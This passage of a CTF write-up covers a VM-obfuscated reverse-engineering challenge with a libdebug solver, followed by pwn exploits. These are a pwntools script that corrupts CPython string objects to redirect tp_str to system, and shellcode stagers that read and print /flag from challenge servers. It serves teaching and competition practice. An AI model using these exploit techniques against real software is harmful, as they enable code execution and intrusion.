(functions and functions[-1].append or base_prog.append)(f"movabs r10, {b:#x}")
(functions and functions[-1].append or base_prog.append)(f"and R{a}, r10")
case 0x2B: # case 43: movzx R[u8], byte ptr [es + R[u8]]
a = r8()
b = r8()
(functions and functions[-1].append or base_prog.append)(f"movzx R{a}, byte ptr [es + R{b}]")
case 0x2C: # case 44: mov byte ptr [es + R[u8]], R[u8]
a = r8()
b = r8()
(functions and functions[-1].append or base_prog.append)(f"mov byte ptr [es + R{b}], R{a}b")
case 0x32: # case 50: cmp R[u8], imm64
a = r8()
b = r64()
(functions and functions[-1].append or base_prog.append)(f"movabs r10, {b:#x}")
(functions and functions[-1].append or base_prog.append)(f"cmp R{a}, r10")
# CUSTOM FUNCTIONS FOR CONVERTING
case 0x33: # case 51: add R[u8], R[u8]
a = r8()
b = r8()
(functions and functions[-1].append or base_prog.append)(f"add R{a}, R{b}")
case 0x34: # case 52: add R[u8], imm64
a = r8()
b = r64()
(functions and functions[-1].append or base_prog.append)(f"movabs r10, {b:#x}")
(functions and functions[-1].append or base_prog.append)(f"add R{a}, r10")
# END CUSTOM FUNCTIONS
case 0x80: # case 128: set_lbl_base
# print(f"set_lbl_base")
functions.append([])
case 0x81: # case 129: def_lbl imm8
a = r8()
# print(f"def_lbl lbl_{a}")
fn = functions.pop()
labeled[f"func_{a}"] = fn[2:] # remove jmp
case 0x82: # case 130: call imm8 (index)
a = r8()
(functions and functions[-1].append or base_prog.append)(f"call func_{a}")
case 0x83: # case 131: ret
(functions and functions[-1].append or base_prog.append)(f"ret")
case 0x84: # case 132: push R[u8]
a = r8()
(functions and functions[-1].append or base_prog.append)(f"push R{a}")
case 0x85: # case 133: pop R[u8]
a = r8()
(functions and functions[-1].append or base_prog.append)(f"pop R{a}")
case 0x90: # case 144: syscall imm8
a = r8()
(functions and functions[-1].append or base_prog.append)(f"mov rdi, {chr(a)!r}")
(functions and functions[-1].append or base_prog.append)(f"call putc")
case 0xFF: # case 255: hlt
(functions and functions[-1].append or base_prog.append)(f"hlt")
case _:
(functions and functions[-1].append or base_prog.append)(f"hlt (invalid op)")
if base_prog[-1].startswith("jmp"):
base_prog = base_prog[:-2]
from pprint import pp
from textwrap import dedent
import re
def gen_c_func(func_name, prog):
# REGISTERS_HI = ['rdi', 'rsi', 'rdx', 'rcx', 'r8', 'r9', 'rbx', 'r12']
# REGISTERS_LO = ['dil', 'sil', 'dl', 'cl', 'r8b', 'r9b', 'bl', 'r12b']
REGISTERS_HI = ['rax', 'rbx', 'rcx', 'rdx', 'rdi', 'rsi', 'r8', 'r9']
REGISTERS_LO = ['al', 'bl', 'cl', 'dl', 'dil', 'sil', 'r8b', 'r9b']
DS_REG = 'r14'
ES_REG = 'r15'
prog = list(map(lambda x: re.sub(r"R(\d)(b?)", lambda m: (REGISTERS_LO if m[2] else REGISTERS_HI)[int(m[1])], x), prog))
prog = list(map(lambda x: x.replace("ds", DS_REG), prog))
prog = list(map(lambda x: x.replace("es", ES_REG), prog))
# pp(base_prog)
template = dedent("""\
void __attribute__((naked)) %s() {
asm(
%s
::);
}
""")
prog.insert(0, ".intel_syntax noprefix")
prog.append(".att_syntax")
asm = "\n ".join(f'"{insn}\\n"' for insn in prog)
return (template % (func_name, asm))
code = """\
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
"""
for k, v in labeled.items():
code += gen_c_func(k, v)
code += gen_c_func("start", base_prog)
code += """\
int main() {
start();
}
"""
with open("generated.c", "w") as f:
f.write(code)
```
The `fix_additions` function was added after some analysis. There's no addition opcode in the vm so the program has to implement an adder manually.
Putting the lifted code into ida shows this (this is after manually passing the first 2 stages, so this is 3 stages worth of decomp)
```c=
void __fastcall __noreturn start()
{
__int64 argc; // rdi
__int64 v1; // rsi
__int64 v2; // rsi
__int64 v3; // rsi
v1 = MEMORY[0xE010];
MEMORY[0x7200] = 0x36B1CC9FE433713DLL;
MEMORY[0x7208] = 0xF97646D69C84EBD8LL;
if ( func_32(
(((MEMORY[0xE010] - 0x48F0E6421AC66DEALL) ^ 0x5074D85B9194E696LL) - 0x5566488C9C5CF234LL)
^ 0x8CB331163A92FC19LL,
(_QWORD *)0x7200) != 0xDA19BA6B81C83F61LL )
func_1(argc, v1);
func_16(argc);
v2 = MEMORY[0xE008];
MEMORY[0x7200] = 0x8D85B3156DF9F721LL;
MEMORY[0x7208] = 0x28E3D33340BC0884LL;
if ( func_32(
((MEMORY[0xE008] ^ 0xE76CAD7AE9451F7CLL) - 0x2ABC75A2C20A1484LL) ^ 0x99D88C4FA4CC68AALL,
(_QWORD *)0x7200) != 0x659391A5DC3522B3LL )
func_1(argc, v2);
func_16(argc);
v3 = MEMORY[0xE0A0];
MEMORY[0x7200] = 0x1D1A63B571BE74BCLL;
MEMORY[0x7208] = 0x3E36EEE3AAC04CFDLL;
if ( func_32(
((((((MEMORY[0xE0A0] + 0x52591D5FA111B92ELL) ^ 0x2D33A64B6933B735LL) - 0x61553C85A2F4E8B9LL)
^ 0x15F909CCB556EC05LL)
- 0x4674252DEE87E8A2LL)
^ 0xE885B64F981D1BAALL)
- 0x6B391C0B7EE7A9F5LL,
(_QWORD *)0x7200) != 0x5538224D4C7A252ALL )
func_1(argc, v3);
func_16(argc);
BUG();
}
```
Memory at 0xExxx is the keys we input, and memory at 0x7xxx is just "stack" memory.
All the functions follow the same format, a series of add, sub, or xor, then it calls `func_32` with the result, and the output has to match some hardcoded value.
`func_1` just prints "Fail\n" and halts, and `func_16` decrypts the next stage. Nothing important for solving this happens in those so I'll be ignoring them.
`func_32` is important, though. This is what the lifted `func_32` looks like. Claude was able to 1-shot inverting this so I didn't put much thought into this.
```c=
// Alternative name is '_0002BE'
__int64 __usercall func_32@<rax>(unsigned __int64 a1@<rax>, _QWORD *ds@<r14>)
{
unsigned __int64 v2; // rbx
unsigned __int64 v3; // rcx
unsigned __int64 v4; // rsi
unsigned __int64 v5; // rdx
unsigned __int64 v6; // rdi
__int64 i; // r8
unsigned __int64 v8; // rax
unsigned __int64 v10; // [rsp-30h] [rbp-48h]
v2 = HIDWORD(a1);
a1 = (unsigned int)a1;
v3 = (unsigned int)*ds;
v4 = HIDWORD(ds[1]);
v5 = HIDWORD(*ds);
v6 = (unsigned int)ds[1];
for ( i = 0; i != 27; ++i )
{
a1 = (unsigned int)v3 ^ ((_DWORD)v2 + (((_DWORD)a1 << 24) ^ (unsigned int)(a1 >> 8)));
v2 = (unsigned int)a1 ^ (unsigned int)(v2 >> 29) ^ (8 * (_DWORD)v2);
if ( i != 26 )
{
v10 = a1;
v8 = (unsigned int)i ^ ((_DWORD)v3 + (((_DWORD)v5 << 24) ^ (unsigned int)(v5 >> 8)));
LODWORD(v3) = v8 ^ (v3 >> 29) ^ (8 * v3);
v5 = v6;
v6 = v4;
v4 = v8;
a1 = v10;
}
}
return (v2 << 32) + a1;
}
```
But figuring out the constants for each stage was a bit annoying. After doing the first 3 manually, I realized that it was probably not in my best interest to do the rest manually, so I implemented a libdebug script that dumps constants as the program runs, then dynamically solves each value at the final comparison instruction, fixes the vm memory to have the correct answer, then continues execution until the very end.
Here is a script that can solve the whole thing in one run (takes a bit to run because the VM does some jank decryption for each stage that takes forever to run):
`decrypt.py`
```python=
def rot_left(x, n):
return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
def rot_right(x, n):
return ((x >> n) | (x << (32 - n))) & 0xFFFFFFFF
def inv_g(y):
x = 0
x |= ((y >> 3) & 0x3FFFFFF) << 0
x |= ((y >> 29) & 0x7) << 26
x |= ((y >> 0) & 0x7) << 29
return x & 0xFFFFFFFF
def inverse_cipher(target, k0_init, k1_init, k2_init, k3_init):
result = target
a1_hi = (result >> 32) & 0xFFFFFFFF
a1_lo = result & 0xFFFFFFFF
round_keys = []
k0, k1, k2, k3 = k0_init, k1_init, k2_init, k3_init
for k in range(27):
round_keys.append(k0)
if k != 26:
v23 = rot_left(k1, 24)
v23 = (k0 + v23) & 0xFFFFFFFF
v26 = k ^ v23
k0_new = (v26 ^ (k0 >> 29) ^ ((k0 << 3) & 0xFFFFFFFF)) & 0xFFFFFFFF
k1, k2, k3 = k2, k3, v26
k0 = k0_new
for k in reversed(range(27)):
k_round = round_keys[k]
g_a1_hi_old = a1_hi ^ a1_lo
a1_hi_old = inv_g(g_a1_hi_old)
v17 = a1_lo ^ k_round
rot_a1_lo_old = (v17 - a1_hi_old) & 0xFFFFFFFF
a1_lo = rot_right(rot_a1_lo_old, 24)
a1_hi = a1_hi_old
return (a1_hi << 32) | a1_lo
```
`solve.py`
```python=
from libdebug import *
from pwnlib.util.packing import u64, u16, p64
from decrypt import inverse_cipher
import operator
# libcontext.debugger_logger = "DEBUG"
libcontext.pipe_logger = "DEBUG"
# libcontext.general_logger = "DEBUG"
d = debugger("./onion2")
io = d.run()
OPERATIONS = []
CHECK_NUM = 0
LAST_CONST_IDX = -1
def run_solver(target: int):
global OPERATIONS
# last two movs are always the consts
const2 = OPERATIONS.pop()
assert const2[0] == 'MOV'
const2 = const2[1]
const1 = OPERATIONS.pop()
assert const1[0] == 'MOV'
const1 = const1[1]
consts = (const1 & 0xffffffff, const1 >> 32, const2 & 0xffffffff, const2 >> 32)
# now normalize operations to add, sub, or xor
result = []
idx = 0
while idx < len(OPERATIONS):
if OPERATIONS[idx][0] == 'MOV':
if idx != len(OPERATIONS) - 1 and \
OPERATIONS[idx + 1][0] == 'XOR' and \
OPERATIONS[idx + 1][1] == OPERATIONS[idx][1] and \
OPERATIONS[idx + 1][2] == 0xffffffffffffffff:
result.append(('SUB', OPERATIONS[idx][1]))
# remove next operation
idx += 1
else:
result.append(('ADD', OPERATIONS[idx][1]))
else:
result.append(('XOR', OPERATIONS[idx][2]))
idx += 1
# from pprint import pp
# pp(result)
for op, val in result:
print(op, hex(val))
INV_OPS = {
"ADD": operator.sub,
"SUB": operator.add,
"XOR": operator.xor
}
val = inverse_cipher(target, *consts)
for op, const in result[::-1]:
val = INV_OPS[op](val, const) & (2**64 - 1)
# print(hex(val))
return val
def replace_bad_key(t: ThreadContext, mem_base: int, size: int, bad: int, good: int):
replaced = False
for i in range(size - 7):
data = t.mem[mem_base + i, 8, "absolute"]
if data == p64(bad):
# t.mem.write(mem_base + i, p64(good))
t.mem[mem_base + i, 8, "absolute"] = p64(good)
print(f"Replaced bad value @ idx {i:#x}")
replaced = True
if not replaced:
print(f"Failed to find bad key {bad:#x} in vm mem")
def cb_cmp(t: ThreadContext, bp):
global CHECK_NUM, OPERATIONS
rsp, rdi = t.regs.rsp, t.regs.rdi
arg1 = u64(t.mem[rsp+rdi*8+0xA8, 8, "absolute"])
arg2 = t.regs.rax
# if 0xDA19BA6B81C83F61 in (arg1, arg2):
# print(hex(arg1), hex(arg2))
if arg2 > 0x10000000:
if arg1 != arg2:
print(f"Failed on check {CHECK_NUM}")
expected_result = run_solver(arg2)
print(f"keys[{LAST_CONST_IDX}] = {expected_result:#x}")
keys[LAST_CONST_IDX] = expected_result
with open("keys2.log", "w") as f: f.write(repr(keys))
# fix stack and registers
fake_key = 0xdeadc0dedead0000 + LAST_CONST_IDX
print("Fixing stack...")
replace_bad_key(
t,
u64(t.mem[t.regs.rsp + 0xA0, 8, "absolute"]),
0x10000,
fake_key,
expected_result
)
print("Fixing registers...")
replace_bad_key(
t,
t.regs.rsp + 0xA8,
0x8 * 8, # 8 registers
fake_key,
expected_result
)
# fix result val too lol
t.mem.write(rsp+rdi*8+0xA8, p64(arg2))
# assert t.mem[rsp+rdi*8+0xA8, 8, "absolute"] == p64(expected_result)
else:
print(f"Passed check {CHECK_NUM}!")
OPERATIONS.clear()
CHECK_NUM += 1
def cb_mov(t: ThreadContext, bp):
val = t.regs.rax
if val > 0x10000:
print(f"mov {val:#x}")
OPERATIONS.append(('MOV', val))
def cb_xor(t: ThreadContext, bp):
rdx, rax = t.regs.rdx, t.regs.rax
if rdx > 0x1000:
print(f"{rdx:#x} ^ {rax:#x}")
OPERATIONS.append(('XOR', rdx, rax))
def cb_const_idx(t: ThreadContext, bp):
global LAST_CONST_IDX
rax, rsi = t.regs.rax, t.regs.rsi
idx = u16(t.mem[rax + rsi, 2, "absolute"])
LAST_CONST_IDX = idx // 8
print(f"{LAST_CONST_IDX = :#x}")
def cb_bad_insn(t: ThreadContext, bp):
rax, rdx = t.regs.rax, t.regs.rdx
insn = t.mem[rax + rdx, 1, "absolute"][0]
print(f"Got bad insn @ {rdx:#x} ({insn:#x})")
d.breakpoint(0x17824, hardware=True, callback=cb_cmp, file="binary")
d.breakpoint(0x17C6A, hardware=True, callback=cb_mov, file="binary")
d.breakpoint(0x177E6, hardware=True, callback=cb_xor, file="binary")
d.breakpoint(0x17DDE, hardware=True, callback=cb_const_idx, file="binary")
d.breakpoint(0x176F1, callback=cb_bad_insn, file="binary")
d.cont()
io.recvuntil(b"keys:")
keys = [None] * 50
for i in range(50):
fake_val = 0xdeadc0dedead0000 + i
io.sendline(str(fake_val).encode())
# d.wait()
print(io.recvuntil(b"}", timeout=9999999))
io.close()
```
Flag: `RCTF{VM_ALU_SMC_RC4_SPECK!_593eb6079d2da6c187ed462b033fee34}`
# Pwn
## mstr
Abuse the cached 1-char strings and modify a str number to make the str_max_size much larger than intended. Use the OOB primitives to get a leak and then overwrite the tp_str of an object to point to `system`
```py=
#!/usr/bin/env python3.13
# -*- coding: utf-8 -*-
from pwn import *
import re
try: from fast_log import make_printv
except: make_printv = lambda **k: lambda *a, **kw: \
print(*a,*["%s: %s"%(k,(hex,repr)[type(v)!=int](v))for k,v in kw.items()],sep="\n")
exe = ELF('./Python-3.12.4/python', checksec=False)
context(
binary=exe,
log_level="debug",
)
REMOTE_ADDR = "1.95.190.154 26000"
def start(**kwargs):
if args.REMOTE:
return remote(*re.split(r":|\s", REMOTE_ADDR), **kwargs)
else:
# return gdb.debug([exe.path, 'mstr.py'], "b*pymain_run_python")
return process([exe.path, 'mstr.py'])
p = start()
sla=p.sendlineafter;sa=p.sendafter;sl=p.sendline;s=p.send
ru=p.recvuntil;rl=p.recvline;r=p.recv
ra = lambda to_skip, rcv_until=b"\n", drop=True: [ru(to_skip), ru(rcv_until, drop=drop)][-1]
safe_link = lambda addr, ptr: (addr >> 12) ^ ptr
ptr_mangle = lambda addr, cookie=0: rol(addr ^ cookie, 17)
ptr_demangle = lambda addr, cookie=0: ror(addr, 17) ^ cookie
ptr_getcookie = lambda mangled, demangled: ptr_demangle(mangled, demangled)
binsh = lambda: next(libc.search(b"/bin/sh\0"))
attach = lambda script=None, api=False: not args.REMOTE and gdb.attach(p, gdbscript=script, api=api)
u32d = lambda data: u32(data.ljust(4, b'\x00'))
u64d = lambda data: u64(data.ljust(8, b'\x00'))
bb = lambda data: data if isinstance(data, bytes) else data.encode()
snum = lambda num: str(num).encode()
hnum = lambda num: hex(num)[2:].encode()
logx = make_printv(log_fn=lambda k,v:info("%s: %s"%(k,v)))
warnx = make_printv(log_fn=lambda k,v:warn("%s: %s"%(k,v)))
PROMPT = b"> "
choice = lambda num: sla(PROMPT, snum(num))
slp = lambda data: sla(PROMPT, bb(data))
###################
## START EXPLOIT ##
###################
STR1 = "A"# * 0x120
STR2 = "B"# * len(STR1)
STR3 = "C"# * len(STR1)
STR4 = "D"# * len(STR1)
STR5 = "W" * (0x30 - 1)
# context.log_level = "DEBUG"
slp(f"new {STR1}") # 0
slp(f"new {STR2}") # 1
slp(f"new {STR3}") # 2
slp(f"new {STR4}") # 3
slp(f"new {STR5}") # 4
# set max to the string "7", this "7" will be the cached 7 (from PyRuntime)
slp("set_max 7 0")
# this creates a new string "777"
slp("new 777") # 5
# this uses the cached 7 again
slp("new 7") # 6
# the cached "7" will be "7777" after this
slp("+= 6 5")
# max size is now 777 so we can do this to overwrite the string length of STR2 to WWWWW....
slp("+= 0 4")
# STR2 is completely unusable, but we can modify data in STR3 now to FINALLY get a leak :sob:
slp(f"modify 1 {0x18} {0x60}")
# get leak
slp("print 2")
PyUnicode_Type = u64d(ra(b"C\0\0\0\0\0\0\0" + p32(-1 % 2**32) + p32(0), p32(-1 % 2**32))[:8])
exe.address = PyUnicode_Type - 0x584fa0
logx(PyUnicode_Type, exe.address)
# write system to a known address
system = exe.address + 0xFF4A0
logx(system)
for i, b in enumerate(p64(system)):
slp(f"modify 1 {0x30 + i} {b}")
# write fake type (just has tp_str pointing to system)
system_ptr = exe.address + 0x675498 + 0x28
fake_type = system_ptr - 0x88
for i, b in enumerate(p64(fake_type)):
slp(f"modify 1 {0x10 + i} {b}")
# write our sh script
script = b"qq;sh\0"
for i, b in enumerate(script):
slp(f"modify 1 {0x8 + i} {b}")
# gg
slp("print 2")
p.interactive()
```
Flag: `RCTF{Y0u_k0wn_how2pwn_pythonnnnnn!}`
## only
Similar to only_rev, the program has a backdoor that allows the user to run up to 10 bytes of shellcode. The shellcode used was as follows:
```asm
; first stage:
call 1f;
1:
pop rsi;
mov dh, 0xff;
syscall;
; second stage:
lea rsi, [rsi-0x2f];
mov rax, 0;
syscall;
mov rdi, rsi;
xor rsi, rsi;
xor rdx, rdx;
mov rax, 2;
syscall;
mov rsi, rdi;
mov rdx, 0x100;
mov rdi, rax;
mov rax, 0;
syscall;
mov rax, 1;
mov rdi, 1;
mov rdx, 0x100;
syscall;
```
```python
#!/usr/bin/env python3
from pwn import *
exe = ELF("./chal_patched")
context.binary = exe
context.aslr = False # rmb to check for brute-forcable stuff!!!
if args.LOCAL:
p = process([exe.path])
if args.GDB:
gdb.attach(p)
pause()
else:
p = remote("101.245.98.115", 26101)
# p = remote("localhost", 9981)
# good luck pwning :)
def exit_notes():
p.sendlineafter(b"5.back", b"5")
def enter_notes():
p.sendlineafter(b"3.exit", b"1")
def create(size):
p.sendlineafter(b"5.back", b"1")
p.sendlineafter(b"size:", str(size).encode())
def delete():
p.sendlineafter(b"5.back", b"2")
def save(filename):
p.sendlineafter(b"5.back", b"3")
p.clean()
p.sendline(filename.encode())
p.recvuntil(b"write content[")
return p.recvuntil(b"]", drop=True)
def enter_bookkeeping():
p.sendlineafter(b"3.exit", b"2")
def secret():
p.sendline(b"8.59256454431393510638249205941E-246")
sleep(2)
def shellcode(sc):
p.sendlineafter(b"a choice:", b"1")
p.sendafter(b"your code:", sc)
enter_bookkeeping()
secret()
# call 1f;
# 1:
# pop rsi;
# mov dh, 0xff;
# syscall;
shellcode(b"\xE8\x00\x00\x00\x00\x5E\xB6\xFF\x0F\x05")
# lea rsi, [rsi-0x2f];
# mov rax, 0;
# syscall;
#
# mov rdi, rsi;
# xor rsi, rsi;
# xor rdx, rdx;
# mov rax, 2;
# syscall;
#
# mov rsi, rdi;
# mov rdx, 0x100;
# mov rdi, rax;
# mov rax, 0;
# syscall;
#
# mov rax, 1;
# mov rdi, 1;
# mov rdx, 0x100;
# syscall;
payload = b"\x90" * (0x30)
payload += b"\x48\x8D\x76\xD1\x48\xC7\xC0\x00\x00\x00\x00\x0F\x05\x48\x89\xF7\x48\x31\xF6\x48\x31\xD2\x48\xC7\xC0\x02\x00\x00\x00\x0F\x05\x48\x89\xFE\x48\xC7\xC2\x00\x01\x00\x00\x48\x89\xC7\x48\xC7\xC0\x00\x00\x00\x00\x0F\x05\x48\xC7\xC0\x01\x00\x00\x00\x48\xC7\xC7\x01\x00\x00\x00\x48\xC7\xC2\x00\x01\x00\x00\x0F\x05"
p.sendline(payload)
sleep(1)
p.sendline(b"./flag\x00")
p.interactive()
```
## only_rev
The program has a backdoor that lets you run any 9 bytes of shellcode. I don't think it was intended to get full RCE from this because there were other parts of the program that I did not interact with at all, but it's possible to abuse an empty read syscall to get the RIP and then read in custom shellcode all within exactly 9 bytes.
```python=
#!/usr/bin/env python3.13
# -*- coding: utf-8 -*-
from pwn import *
import re
try: from fast_log import make_printv
except: make_printv = lambda **k: lambda *a, **kw: \
print(*a,*["%s: %s"%(k,(hex,repr)[type(v)!=int](v))for k,v in kw.items()],sep="\n")
exe = ELF("./bin/chal_patched", checksec=False)
libc = ELF("./bin/libc.so.6", checksec=False)
ld = ELF("./ld-2.39.so", checksec=False)
context(
binary=exe,
log_level="debug",
# terminal="wt.exe -M wsl".split()
)
REMOTE_ADDR = "1.95.164.64 26000"
# REMOTE_ADDR = "localhost 9981"
def start(**kwargs):
if args.REMOTE:
return remote(*re.split(r":|\s", REMOTE_ADDR), **kwargs)
else:
# return gdb.debug([exe.path])
return process([exe.path])
p = start()
sla=p.sendlineafter;sa=p.sendafter;sl=p.sendline;s=p.send
ru=p.recvuntil;rl=p.recvline;r=p.recv
ra = lambda to_skip, rcv_until=b"\n", drop=True: [ru(to_skip), ru(rcv_until, drop=drop)][-1]
safe_link = lambda addr, ptr: (addr >> 12) ^ ptr
ptr_mangle = lambda addr, cookie=0: rol(addr ^ cookie, 17)
ptr_demangle = lambda addr, cookie=0: ror(addr, 17) ^ cookie
ptr_getcookie = lambda mangled, demangled: ptr_demangle(mangled, demangled)
binsh = lambda: next(libc.search(b"/bin/sh\0"))
attach = lambda script=None, api=False: not args.REMOTE and gdb.attach(p, gdbscript=script, api=api)
u32d = lambda data: u32(data.ljust(4, b'\x00'))
u64d = lambda data: u64(data.ljust(8, b'\x00'))
bb = lambda data: data if isinstance(data, bytes) else data.encode()
snum = lambda num: str(num).encode()
hnum = lambda num: hex(num)[2:].encode()
logx = make_printv(log_fn=lambda k,v:info("%s: %s"%(k,v)))
warnx = make_printv(log_fn=lambda k,v:warn("%s: %s"%(k,v)))
PROMPT = b"> "
choice = lambda num: sla(PROMPT, snum(num))
slp = lambda data: sla(PROMPT, bb(data))
###################
## START EXPLOIT ##
###################
# attach("brva 0x1A79")
sla(b"exit\n", b"2")
sla(b"input:\n", snum(struct.unpack("<d", 0xD0E0A0D0B0E0E0F.to_bytes(8, 'little'))[0]))
sla(b"choice:", b"1")
code = [
b"\x0f\x05", # syscall
b"\x48\x89\xce", # mov rsi, rcx
b"\xb2\xff", # mov dl, 0xff
b"\x0f\x05", # syscall
]
raw = b"".join(code)
sa(b"code:", raw)
shellcode = "sub rsp, 0x12345678\nxor edx, edx\n" + shellcraft.cat("/flag")
raw = asm(shellcode)
time.sleep(0.5)
sl(b"\x90" * (0x41 - 0x3a) + raw)
p.interactive()
```
Flag: `RCTF{f878b22c-5542-4b51-9780-d1188750f3ce}[`